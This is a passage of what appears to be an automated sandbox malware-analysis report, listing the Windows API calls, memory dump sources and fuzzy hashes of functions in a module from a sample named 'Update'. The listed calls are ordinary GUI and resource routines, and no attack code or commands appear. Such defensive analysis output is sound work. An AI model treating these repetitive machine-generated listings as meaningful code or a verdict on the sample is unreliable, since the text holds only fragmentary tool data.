                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Resource$FindLoadLockSizeof
                                              • String ID:
                                              • API String ID: 3473537107-0
                                              • Opcode ID: 60e0adb2735e8e1b44e72c466073fcdda14efc232bf2b6b57fb6ae1472b35716
                                              • Instruction ID: b850b7b43b869a288761cf492a4f15c45895e793b41925d73f2212c8faf120e6
                                              • Opcode Fuzzy Hash: 60e0adb2735e8e1b44e72c466073fcdda14efc232bf2b6b57fb6ae1472b35716
                                              • Instruction Fuzzy Hash: 9021F3727022145BF7205B69CCC5B6B77ACEF62359B15412AFC55CB380EB2DD804C7A2
                                              APIs
                                              • RedrawWindow.USER32(?,00000000,00000000,00000585,?,?,00000000,?,6C212A7F,00000002,00000000,?,?,?,6C1E8704), ref: 6C212AC5
                                              • RedrawWindow.USER32(?,00000000,00000000,00000585,?,00000000,?,6C212A7F,00000002,00000000,?,?,?,6C1E8704,?,00000000), ref: 6C212AF2
                                              • RedrawWindow.USER32(?,00000000,00000000,00000185,?,00000000,?,6C212A7F,00000002,00000000,?,?,?,6C1E8704,?,00000000), ref: 6C212B2F
                                              • RedrawWindow.USER32(?,00000000,00000000,00000585,?,?,?,?,6C1E8704,?,00000000), ref: 6C22E708
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: RedrawWindow
                                              • String ID:
                                              • API String ID: 2219533335-0
                                              • Opcode ID: 1a12c5da3c015e8b75456115607a45405ccd42c6118c2949b4c64dc0cd96bb6c
                                              • Instruction ID: a4d1e95daf1522b474e5eddb44bba69c37047ec7ab9d9f626b0957c12f8e74d9
                                              • Opcode Fuzzy Hash: 1a12c5da3c015e8b75456115607a45405ccd42c6118c2949b4c64dc0cd96bb6c
                                              • Instruction Fuzzy Hash: F021C472745A276BEB225E21DC48F5A36B4BF4AB17F220115FD5177EE0EB60F8009B90
                                              APIs
                                              • DestroyMenu.USER32(?,8BAE044A,?,?,?,Function_00184D80,000000FF), ref: 6C206864
                                              • IsWindow.USER32(?), ref: 6C206875
                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C206889
                                              • Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C2068E6
                                                • Part of subcall function 6C279817: GetParent.USER32(00000000), ref: 6C27989E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ContextExternal$BaseBase::~Concurrency::details::DestroyMenuMessageParentSendWindow
                                              • String ID:
                                              • API String ID: 3377428259-0
                                              • Opcode ID: 57ebac38289384ed01839fffd1b310684bb04d0078a281a5a6557fca0103d2a6
                                              • Instruction ID: 1e45701782dce08169a50c81619a74033af1fb98ff60c379ff96b538d4f0f5a6
                                              • Opcode Fuzzy Hash: 57ebac38289384ed01839fffd1b310684bb04d0078a281a5a6557fca0103d2a6
                                              • Instruction Fuzzy Hash: 05216B742017458BD729DF74C890AEAB7B8FF56758F00482EE86782B80DF79644ACA51
                                              APIs
                                              • FindResourceW.KERNEL32(?,?,00000005), ref: 6C1F4A9B
                                              • LoadResource.KERNEL32(?,00000000), ref: 6C1F4AB0
                                              • LockResource.KERNEL32(00000000), ref: 6C1F4AC2
                                              • GlobalFree.KERNEL32(?), ref: 6C1F4B01
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Resource$FindFreeGlobalLoadLock
                                              • String ID:
                                              • API String ID: 3898064442-0
                                              • Opcode ID: 21ea5ce293c53ae834e9cb92248def7d32788bc68642619e4196caea7339de3d
                                              • Instruction ID: e42e0397db21ea74acc66d16b11294762ca903943f9567cdf36f50bc86d2aa45
                                              • Opcode Fuzzy Hash: 21ea5ce293c53ae834e9cb92248def7d32788bc68642619e4196caea7339de3d
                                              • Instruction Fuzzy Hash: E811E631601A15AFDB119F55C944B9ABBF8EF15368F058268EC2AA7B01CB309C058BE5
                                              APIs
                                              • GdipCreateFromHDC.GDIPLUS(?,?), ref: 6C23EE35
                                              • GdipSetInterpolationMode.GDIPLUS(?,?,?,?), ref: 6C23EE46
                                              • GdipDeleteGraphics.GDIPLUS(?,?,?,?,?), ref: 6C23EE7C
                                              • GdipDisposeImage.GDIPLUS(?), ref: 6C23EE84
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Gdip$CreateDeleteDisposeFromGraphicsImageInterpolationMode
                                              • String ID:
                                              • API String ID: 3656396538-0
                                              • Opcode ID: ee81af83dadef7af622b2e9225cff113c01a4d9f343019829f0034ca92ef004d
                                              • Instruction ID: 6b64a65bb42b9da4cf48e230b9a906883530c535204f13aa43b97805208cd660
                                              • Opcode Fuzzy Hash: ee81af83dadef7af622b2e9225cff113c01a4d9f343019829f0034ca92ef004d
                                              • Instruction Fuzzy Hash: 4A115EB1900229AFCF00DFB8C944DDEBBB8EF09658B104558E819E7650D732DE1A9BD0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$H_prolog3Parent
                                              • String ID:
                                              • API String ID: 281833477-0
                                              • Opcode ID: e10ca418f22982936ad383d5e71aa5d687033811126cd04b69067dd51f0b788b
                                              • Instruction ID: f5cafe7392fc2688128c3f779bf40d0cb953f103d5402fd317d5039a3e8dc2b8
                                              • Opcode Fuzzy Hash: e10ca418f22982936ad383d5e71aa5d687033811126cd04b69067dd51f0b788b
                                              • Instruction Fuzzy Hash: C1110173A02A2DABEB125BB4CC08FDD33756F45308F590116F905EBA90CF309808C761
                                              APIs
                                              • CreateThread.KERNEL32(00000000,?,6C318B14,00000000,00000004,00000000), ref: 6C318A38
                                              • GetLastError.KERNEL32(?,?,?,6C2627C3,6C262813,00000000,00000000,?,00000000,?,6C1FAB85,00000001,00000000,?,?,6C1FA81B), ref: 6C318A44
                                              • __dosmaperr.LIBCMT ref: 6C318A4B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CreateErrorLastThread__dosmaperr
                                              • String ID:
                                              • API String ID: 2744730728-0
                                              • Opcode ID: b419c98b836b39d61eb09250bedada6d12f5d86024c4aa7123255e1eb50169a5
                                              • Instruction ID: ad2c85c015061c4d468587a4ed237321dbb5cf6ccc672d80cd0ad1a9f67169d1
                                              • Opcode Fuzzy Hash: b419c98b836b39d61eb09250bedada6d12f5d86024c4aa7123255e1eb50169a5
                                              • Instruction Fuzzy Hash: 4401C872606304AFCB058BA5CC04BDE7ABDDF8237AF21421AF520969D0D7708944CAA6
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Destroy
                                              • String ID:
                                              • API String ID: 3707531092-0
                                              • Opcode ID: 3f222d5b4086198ee415c37ab2c3055f495371f1751781f8024969c3b7d0ef1a
                                              • Instruction ID: 8c1b49d241b00aedce268722165c847c800169a6942ca78cc6d25a8078a95024
                                              • Opcode Fuzzy Hash: 3f222d5b4086198ee415c37ab2c3055f495371f1751781f8024969c3b7d0ef1a
                                              • Instruction Fuzzy Hash: D011C07520265AABEF015F51D888BD97B79FF8132AF208129FE1E8B541CFB59510CBB0
                                              APIs
                                              • GetMenuItemCount.USER32(00000000), ref: 6C1CAAE1
                                              • GetSubMenu.USER32(00000000,-00000001), ref: 6C1CAAF0
                                              • GetMenuItemCount.USER32(00000000), ref: 6C1CAAFD
                                              • GetMenuItemID.USER32(00000000,00000000), ref: 6C1CAB13
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Menu$Item$Count
                                              • String ID:
                                              • API String ID: 879546783-0
                                              • Opcode ID: 8dd8fb8051bed6b629d89746b2e7135dec1e2f0df4bb68cf15a05281e78f5368
                                              • Instruction ID: 4677441c561192f34b4f842e8894c0546b4437ced95cd782b8ce19395c300268
                                              • Opcode Fuzzy Hash: 8dd8fb8051bed6b629d89746b2e7135dec1e2f0df4bb68cf15a05281e78f5368
                                              • Instruction Fuzzy Hash: 7F016270B03116AFEB16CF64DD98B9F7AFADF35744F104525F906E6600DA78CA408751
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: EmptyRect
                                              • String ID:
                                              • API String ID: 2270935405-0
                                              • Opcode ID: 791e64a8b34a9ae37347a0db783f173fefd6ec482cf7233b7841b46b074d1f32
                                              • Instruction ID: 5bd207ac6f7e40c3a811508ae55474f05f32abccdefe312b44aa97202f6163cd
                                              • Opcode Fuzzy Hash: 791e64a8b34a9ae37347a0db783f173fefd6ec482cf7233b7841b46b074d1f32
                                              • Instruction Fuzzy Hash: 72E0C9715117168FEB709F61C449AC677FCFF0631AB900819E187C3911D778E589CB90
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C2A2DF2
                                                • Part of subcall function 6C1CC5AB: __EH_prolog3.LIBCMT ref: 6C1CC5B2
                                                • Part of subcall function 6C1CC5AB: CreateSolidBrush.GDI32(6C1D8A6F), ref: 6C1CC5CD
                                              • FillRect.USER32(?,?,?), ref: 6C2A2EB6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: H_prolog3$BrushCreateFillRectSolid
                                              • String ID: (^4l
                                              • API String ID: 3708192491-3721299443
                                              • Opcode ID: c821d9de1ee0f8518be740b437e3f5e7f4b57fdfd5e8cd13cba2ab7796b4e4d9
                                              • Instruction ID: 3879f3d3cbb7e5eaea4ff762d9a48fa6417bc5ae152d9058d55f2432ce6c824a
                                              • Opcode Fuzzy Hash: c821d9de1ee0f8518be740b437e3f5e7f4b57fdfd5e8cd13cba2ab7796b4e4d9
                                              • Instruction Fuzzy Hash: 7B61937190161ADBCF05DF96C884BDE77B1AF49315F144165FC28EFA90DB30A946CBA0
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C1B2C06
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C1B2D16
                                                • Part of subcall function 6C1E57A9: _Yarn.LIBCPMT ref: 6C1E57C9
                                                • Part of subcall function 6C1E57A9: _Yarn.LIBCPMT ref: 6C1E57ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                              • String ID: bad locale name
                                              • API String ID: 2070049627-1405518554
                                              • Opcode ID: 86e2b66b32206485388f3710da6cfc267971616e13507577469ca00cdd3d86f2
                                              • Instruction ID: 5b90beda36ec1189dd9b3354003ad1fec61ecf8474d955107919d23dd881bdfd
                                              • Opcode Fuzzy Hash: 86e2b66b32206485388f3710da6cfc267971616e13507577469ca00cdd3d86f2
                                              • Instruction Fuzzy Hash: B0416DF1A01B419BDB20CF6AD948B56BBE8BF18604F044629E449D7F40E739E418CFE2
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C26A97F
                                                • Part of subcall function 6C2E5BD9: __EH_prolog3.LIBCMT ref: 6C2E5BE0
                                                • Part of subcall function 6C2E5BD9: GetProfileIntW.KERNEL32(windows,DragScrollInset,0000000B), ref: 6C2E5C2B
                                                • Part of subcall function 6C2E5BD9: GetProfileIntW.KERNEL32(windows,DragScrollDelay,00000032), ref: 6C2E5C3E
                                                • Part of subcall function 6C2E5BD9: GetProfileIntW.KERNEL32(windows,DragScrollInterval,00000032), ref: 6C2E5C51
                                              • SetRectEmpty.USER32(?), ref: 6C26AB75
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Profile$H_prolog3$EmptyRect
                                              • String ID: (^4l
                                              • API String ID: 1529447813-3721299443
                                              • Opcode ID: 02ad9f5eac476fc567d5e88cb0336b180db1180bfc3beb59939b7ba8d47f7c63
                                              • Instruction ID: b1cef4b4fb132ae236e7b23d6eae4708c19552b849e84963aa77e22c265558c3
                                              • Opcode Fuzzy Hash: 02ad9f5eac476fc567d5e88cb0336b180db1180bfc3beb59939b7ba8d47f7c63
                                              • Instruction Fuzzy Hash: E15165B0A09B46AFD34CCF39A5817D9FBA0BB09304F50822EE56D93740CB7021A5CF98
                                              APIs
                                              • GetMonitorInfoW.USER32(?,?), ref: 6C1E8972
                                              • CopyRect.USER32(?,?), ref: 6C1E8984
                                                • Part of subcall function 6C1C9B7C: __EH_prolog3.LIBCMT ref: 6C1C9B83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CopyH_prolog3InfoMonitorRect
                                              • String ID: (
                                              • API String ID: 76778085-3887548279
                                              • Opcode ID: 27d5742127cd242236e6dee8808868a5ba4601dd594bd2626f316780cce2dc46
                                              • Instruction ID: 114e56e717bae36ffe510cf367dfb8bf2d7dc5cc4a237fbe8e0bdbf2d0a602e1
                                              • Opcode Fuzzy Hash: 27d5742127cd242236e6dee8808868a5ba4601dd594bd2626f316780cce2dc46
                                              • Instruction Fuzzy Hash: AD214C71A00609EFCB14DFA8D544A8EB7F9FF48314B10842EE596E3690DB70EA44CB61
                                              APIs
                                              • GetSysColor.USER32(00000014), ref: 6C1E8876
                                              • CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 6C1E88EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: BitmapColorCreate
                                              • String ID: (
                                              • API String ID: 2048008349-3887548279
                                              • Opcode ID: ea4ed1e6b99c437930a94cfcedd2801d93fc7d0e9f692eee71ec616c34fc8dfb
                                              • Instruction ID: 228842d98eef5bd3778fd2af925603af7a0fc3462ba03eac84efce3818fad9ee
                                              • Opcode Fuzzy Hash: ea4ed1e6b99c437930a94cfcedd2801d93fc7d0e9f692eee71ec616c34fc8dfb
                                              • Instruction Fuzzy Hash: 00219521A1178CDAEF01DFB88842BDCB7B8BF1A204F14C159E945F7181DF345A88CB65
                                              APIs
                                              • FillRect.USER32(?,/m"l,-000000D0), ref: 6C29E54F
                                              • FillRect.USER32(?,/m"l,?), ref: 6C29E584
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: FillRect
                                              • String ID: /m"l
                                              • API String ID: 2175405051-2058113876
                                              • Opcode ID: 1b79c5f85323f84183113c053af9548a44b415c4fb3aa39e0a0d50181aefcf7e
                                              • Instruction ID: 4e0ee1d47eb05963100ed4fb5eff59e6c106e8e2b39d6293abac373137f26087
                                              • Opcode Fuzzy Hash: 1b79c5f85323f84183113c053af9548a44b415c4fb3aa39e0a0d50181aefcf7e
                                              • Instruction Fuzzy Hash: 10118E76601109EFEB009B9AC945FDE7BB8FF5A354F148126F805CB651EB34D900CBA1
                                              APIs
                                              Strings
                                              Memory Dump Source
